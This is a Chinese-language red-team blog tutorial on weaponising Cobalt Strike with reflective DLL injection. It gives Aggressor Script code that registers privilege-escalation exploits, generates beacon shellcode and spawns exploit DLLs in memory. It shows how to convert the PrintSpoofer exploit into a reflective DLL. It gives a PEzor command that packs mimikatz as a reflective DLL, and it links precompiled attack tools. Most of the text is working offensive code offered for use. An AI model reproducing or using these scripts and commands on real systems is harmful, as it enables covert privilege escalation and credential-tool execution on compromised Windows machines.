使用ReflectiveDLLInjection武装你的CobaltStrike
使用ReflectiveDLLInjection武装你的CobaltStrike
众所周知,CobaltStrike是一款优秀的C2工具,但其没有为我们提供想metasploit那样丰富的提权功能,好在其AggressorScript为我们提供了无限的可能,也衍生除了很多优秀的cna脚本,比如taowu等等。里面就包含了提权功能,下面是部分脚本中提权功能的实现:
可以看到方式各不相同,部分需要exe落地,而有的则使用了今天我们需要讲的ReflectiveDLLInjection,通常,在进程启动时,DLL被加载到内存中;但是,DLL也可以注入到正在运行的进程中。通过DLL注入,我们不再需要创建进程来执行代码(各种DLL注入技术);但是,我们仍然需要将文件写入磁盘才能完成注入。反射型DLL注入解决了这个问题。该技术由StephenFewer开发,允许我们将代码注入现有进程而无需写入磁盘。因此,利用型反射DLL注入,我们可以跳过写入磁盘以及创建进程,直接将代码完整注入内存,AggressorScript脚本提供了一些关于反射DLL的接口:https://cobaltstrike.com/aggressor-script/functions.html#bdllspawn
那么我们下面就来写一个简单的ReflectiveDLLInjection,在之前已经有了比较成熟的项目,我们直接拿过来用即可:https://github.com/stephenfewer/ReflectiveDLLInjection
效果为启动弹出helloworld。
然后就是写cna了,简单的写一下就行:
alias reflective_dll {
btask($1, "reflective_dll test");
bdllspawn!($1, script_resource("reflective_dll.x64.dll"), $null, "MessageBox" , 1000);
}然后CobaltStrike运行reflective_dll就行啦。那么上面说到了提权,我们就来看一下如何将提权exp进行反射处理,这里以PrintSpoofer(https://github.com/itm4n/PrintSpoofer)为例:
首先导入相关的头文件:ReflectiveDllInjection.h、ReflectiveLoader.cpp、ReflectiveLoader.h。
接下来,就是删除原文件中的main了。
然后需要更改的就是GetSystem函数,原来的exp,该函数是用来进行后续的CreateProcessAsUser操作的,我们这里用不到,把它改成下面这样就行了:
BOOL GetSystem(HANDLE hPipe)
{
if (!ImpersonateNamedPipeClient(hPipe))
{
wprintf(L"ImpersonateNamedPipeClient(). Error: %d\n", GetLastError());
return FALSE;
}
wprintf(L"[+] ImpersoneteNamedPipeClient OK\n");
return TRUE;
}然后将之前在main中需要实现的过程,在dll中进行实现:
基本上就差不多了,接下来就是编译成x86、x64版本的就行啦。
然后来编写我们的cna文件:
注册提权使用的是beacon_exploit_register
sub ms16_016_exploit {
local('$stager');
# check if we're on an x64 system and error out.
if (-is64 $1) {
berror($1, "ms16-016 exploit is x86 only");
return;
}
# acknowledge this command
btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016", "T1068");
# generate our shellcode
$stager = payload($2, "x86");
# spawn a Beacon post-ex job with the exploit DLL
bdllspawn!($1, getFileProper(script_resource("modules"), "cve-2016-0051.x86.dll"), $stager, "ms16-016", 5000);
# link to our payload if it's a TCP or SMB Beacon
beacon_link($1, $null, $2);
}
beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)", &ms16_016_exploit);仿照该代码,编写我们的:
sub printspoofer {
btask($1, "Task Beacon to run " . listener_describe($2) . " PrintSpoofer");
if (-is64 $1)
{
$arch = "x64";
$dll = script_resource("x64.dll");
} else {
$arch = "x86";
$dll = script_resource("x86.dll");
}
$stager = shellcode($2, false, $arch);
bdllspawn!($1, $dll, $stager, "PrintSpoofer local elevate privilege", 5000);
bstage($1, $null, $2, $arch);
}
beacon_exploit_register("PrintSpoofer", "PrintSpoofer local elecate privilege", &printspoofer);
好了,进行测试。。
除了自己写之外呢,最近新出的pezor也可以实现相同的效果:
PEzor.sh -format=reflective-dll mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'文章中的所涉及的编译好的文件已上传至GitHub,需要的自取:https://github.com/lengjibo/RedTeamTools/tree/master/windows/PrintSpoofer_ReflectiveDLL
参考文章:
https://payloads.online/archivers/2020-03-02/1
https://bbs.pediy.com/thread-246930.htm
https://cobaltstrike.com/aggressor-script/functions.html